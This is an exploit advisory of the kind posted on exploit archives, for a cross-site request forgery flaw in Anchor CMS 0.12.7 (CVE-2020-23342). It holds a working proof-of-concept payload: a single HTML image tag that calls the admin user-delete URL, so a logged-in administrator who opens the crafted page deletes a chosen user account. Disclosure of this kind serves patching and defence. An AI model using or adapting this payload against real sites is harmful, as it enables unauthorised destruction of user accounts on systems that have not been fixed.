# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)# Exploit Author: Ninad Mishra# Vendor Homepage: https://anchorcms.com/# Software Link: https://anchorcms.com/download# Version: 0.12.7# CVE : CVE-2020-23342###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
================================
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================
Where (21) is the user id .
When admin clicks on exploit.html link
User with id 21 will be deleted
